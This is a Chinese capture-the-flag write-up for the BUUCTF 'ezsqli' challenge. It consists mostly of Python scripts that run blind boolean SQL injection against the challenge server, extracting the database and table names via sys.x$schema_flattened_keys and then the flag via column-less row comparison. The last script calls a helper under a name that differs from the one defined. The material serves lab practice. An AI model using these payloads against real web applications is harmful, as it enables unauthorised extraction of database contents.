ezsqli
)
爆库
give_grandpa_pa_pa_pa
import requests
url = "http://76447fe2-fcf7-4d5d-8f7f-4a1e35668681.node3.buuoj.cn/index.php"
data = {"id":""}
result = ""
i = 0
while( True ):
i = i + 1
head=32
tail=127
while( head < tail ):
mid = (head + tail) >> 1
#payload = "if(ascii(substr(database(),%d,1))>%d,1,0)" % (i , mid)
#payload = "if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)" % (i , mid)
#payload = "if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_name='flag')),%d,1))>%d,1,0)" % (i , mid)
#payload = "if(ascii(substr((select/**/group_concat(flag)from(ctf.flag)),%d,1))>%d,1,0)" % (i , mid)
data['id'] = "1+(ascii(substr(database(),%d,1))>%d)" % (i , mid)
#print(data)
r = requests.post(url,data=data)
r.encoding = "utf-8"
#print(url+payload)
#print(r.text)
if "V&N" in r.text :
head = mid + 1
else:
#print(r.text)
tail = mid
last = result
if head!=32:
result += chr(head)
else:
break
print(result)
爆表
information_schema被禁用了
然后看了大佬的wp发现还有个可用 sys.x$schema_flattened_keys可以用来爆
select/**/group_concat(table_name)from(sys.x$schema_flattened_keys)where(table_schema=database()
发现两张表:
f1ag_1s_h3r3_hhhhh,users233333333333333
import requests
url = "http://76447fe2-fcf7-4d5d-8f7f-4a1e35668681.node3.buuoj.cn/index.php"
data = {"id":""}
result = ""
i = 0
while( True ):
i = i + 1
head=32
tail=127
while( head < tail ):
mid = (head + tail) >> 1
#payload = "if(ascii(substr(database(),%d,1))>%d,1,0)" % (i , mid)
#payload = "if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)" % (i , mid)
#payload = "if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_name='flag')),%d,1))>%d,1,0)" % (i , mid)
#payload = "if(ascii(substr((select/**/group_concat(flag)from(ctf.flag)),%d,1))>%d,1,0)" % (i , mid)
data['id'] = "1+(ascii(substr((select/**/group_concat(table_name)from(sys.x$schema_flattened_keys)where(table_schema=database())),%d,1))>%d)" % (i , mid)
#print(data)
r = requests.post(url,data=data)
r.encoding = "utf-8"
#print(url+payload)
#print(r.text)
if "V&N" in r.text :
head = mid + 1
else:
#print(r.text)
tail = mid
last = result
if head!=32:
result += chr(head)
else:
break
print(result) 
直接爆字段
无列明爆字段,学到了,但是还是很疑惑这个列数怎么得到的
抄了大师傅的链接: http://www.gem-love.com/ctf/1782.html
学到新姿势,用字符串比较来爆破。
# -*- coding: utf-8 -*-
import requests
def to_hex(str):
result = '0x'
for i in str:
temp = hex(ord(i))
result += temp.replace('0x','')
return result
url = "http://76447fe2-fcf7-4d5d-8f7f-4a1e35668681.node3.buuoj.cn/index.php"
data = {"id":""}
result = ""
cont = 100
while( cont>0 ):
for i in range(32,126):
now_str = trans_to_hex( result+chr(i) )
data['id'] = "1+((select 1,{})>(select * from f1ag_1s_h3r3_hhhhh limit 2,1))".format(now_str)
#print(data)
r = requests.post(url,data=data)
r.encoding = "utf-8"
#print(r.text)
if "V&N" in r.text :
result+=chr(i-1)
print(result)
cont = cont - 1
break 
京公网安备 11010502036488号